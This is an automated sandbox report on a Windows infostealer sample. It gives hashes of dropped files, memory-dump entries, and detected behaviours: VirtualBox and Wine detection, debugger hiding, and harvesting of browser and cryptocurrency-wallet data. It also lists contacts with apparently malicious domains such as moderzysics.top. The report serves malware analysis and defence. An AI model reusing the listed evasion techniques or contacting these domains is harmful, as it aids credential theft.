memory/5292-908-0x0000000000CB0000-0x0000000001108000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe

MD5 2bb133c52b30e2b6b3608fdc5e7d7a22
SHA1 fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256 b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA512 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

memory/5292-983-0x0000000000CB0000-0x0000000001108000-memory.dmp

memory/5292-999-0x0000000000CB0000-0x0000000001108000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe

MD5 6006ae409307acc35ca6d0926b0f8685
SHA1 abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256 a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512 b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

memory/6108-1038-0x0000000000DF0000-0x000000000128B000-memory.dmp

memory/5940-1039-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/5940-1052-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/5836-1061-0x0000023D2FB90000-0x0000023D2FB98000-memory.dmp

memory/6108-1070-0x0000000000DF0000-0x000000000128B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe

MD5 641525fe17d5e9d483988eff400ad129
SHA1 8104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA256 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512 ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

memory/4300-1087-0x0000000000740000-0x00000000007B0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp

MD5 6b297d474a7a11e5cf3b52665631b697
SHA1 cf0d1d7692bdfb3a9d7082f20be8750e39627fd0
SHA256 c0b047a7c0afe16a7f886284e0e5b4ae6dffb64db39f014c7a92671f73e521bc
SHA512 e29ca1eb19f09b051b2b33078ef88416e563befa26bab92d6986baa68bd084a00e38f2a6f3bdd1b2d2ae5a3f67421004009b3a5f108112144631f841fbd805a6

C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe

MD5 d39df45e0030e02f7e5035386244a523
SHA1 9ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256 df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA512 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

memory/4996-1138-0x0000023AFB8D0000-0x0000023AFB8E2000-memory.dmp

memory/4996-1139-0x0000023AFBC70000-0x0000023AFBC80000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\prefs-1.js

MD5 d9bea1903f5e177cdc18bbcc1dab0775
SHA1 e653e1205fdd9b3c01606f6ed62c1e80d84a0c45
SHA256 7ff37b4a51be372acf0e650bd51b71a851b593836562194ed9346decb4fb1f58
SHA512 debe8f0385e2b471c9abdd59c5da8b8fc0a28864fee0aed4aad394087f8796b2f3f9e45959c0d20d43eb05ceb0f5a90d2eb4324e304dbccc52c46f3ddf76f1d1

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\AlternateServices.bin

MD5 bad4b2be63239af9c7e2d80768239001
SHA1 00c157d24e3aca881763f11eab3a0b3d5e239d0f
SHA256 93847ba39ad58bc09fa31c8ceb83631395e97e81360744ef6fd7ae07c2fb367c
SHA512 2b925de703b41d6630785fb56d63e9b02b70e8944e76d04439d6673d71c5e3928b0d9f0dda32abab00e566eb98beb83ee6dbb1549108fe0a4df1ae94065a3003

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/6740-1353-0x0000000000BB0000-0x0000000000C10000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\8PKTZ3BC\microsoft.windows[1].xml

MD5 77cc82955ce893463f41601027f87ac2
SHA1 735452540cbaec9e70d0e63c0d8433a3ea230678
SHA256 9be9016f70328b4742f54c3a3bb7387bccd76210084593015a42972593d48a34
SHA512 0b060b863f9ec90c3c9e3bac05111f0a793c570b443af6a982df027d13f4377c4b50662c7cbd7e1862fdd985410a08895b45eb80d86a95a950bdc7a4ba727ac8

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-05 23:11

Reported

2025-03-05 23:14

Platform

win7-20250207-en

Max time kernel

121s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe

"C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 272 -s 1216

Network

Country Destination Domain Proto
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 172.67.189.66:443 moderzysics.top tcp

Files

memory/272-0-0x0000000000FE0000-0x0000000001307000-memory.dmp

memory/272-1-0x0000000076ED0000-0x0000000076ED2000-memory.dmp

memory/272-2-0x0000000000FE1000-0x0000000001041000-memory.dmp

memory/272-4-0x0000000000FE0000-0x0000000001307000-memory.dmp

memory/272-3-0x0000000000FE0000-0x0000000001307000-memory.dmp

memory/272-5-0x0000000000FE0000-0x0000000001307000-memory.dmp

memory/272-6-0x0000000000FE0000-0x0000000001307000-memory.dmp

memory/272-7-0x0000000000FE1000-0x0000000001041000-memory.dmp